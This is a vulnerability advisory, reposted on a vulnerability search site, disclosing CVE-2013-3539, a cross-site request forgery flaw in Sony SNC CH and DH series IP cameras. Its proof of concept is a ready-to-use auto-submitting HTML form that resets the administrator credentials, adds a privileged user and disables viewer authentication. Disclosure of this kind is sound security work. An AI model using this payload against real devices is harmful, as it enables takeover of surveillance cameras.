Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Sony CH / DH Cross Site Request Forgery

Related Vulnerabilities: CVE-2013-3539  
Publish Date: 13 Jun 2013
Author: Jonas Rapero Castillo
Source 
                							

                ===========================================================================
SONY
====================================================================
===========================================================================

1.Advisory Information
Title: Sony CH, DH Series Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
We have been found the next vulnerability in this devices
-CVE-2013-3539. Cross Site Request Forgery(CWE-352)

3.Affected Products
CVE-2013-3539, the following product are affected SNC CH140, SNC CH180, SNC CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and SNC DH280.
It’s possible others models are affected but they were not checked.

4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3539, CSRF via POST method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities. 
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
This is our .html attack.
_____________________________________________________________________________
<html>
<body>
  <form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
    <input type="Select" name="ViewerModeDefault" value="00000fff">
    <input type="Hidden" name="ViewerAuthen" value="off">
    <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
    <input type="Hidden" name="User1" value="xxxx,c0000fff">
    <input type="Hidden" name="User2" value="xxxx,c0000fff">
    <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
    <input type="Hidden" name="User4" value="Og==,00000fff">
    <input type="Hidden" name="User5" value="Og==,00000fff">
    <input type="Hidden" name="User6" value="Og==,00000fff">
    <input type="Hidden" name="User7" value="Og==,00000fff">
    <input type="Hidden" name="User8" value="Og==,00000fff">
    <input type="Hidden" name="User9" value="Og==,00000fff">
    <input type="Hidden" name="Reload" value="referer">
    <script>document.SonyCsRf.submit();</script>
 </form>
</body>
</html>
_____________________________________________________________________________
Now we can check that we have a new user in the configuration.

5.Credits
CVE-2013-3539 was discovered by Jonás Ropero Castillo. .

6.Report Timeline
-2013-05-25: Students team notifies the Sony Customer Support of the vulnerability. No reply received.
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started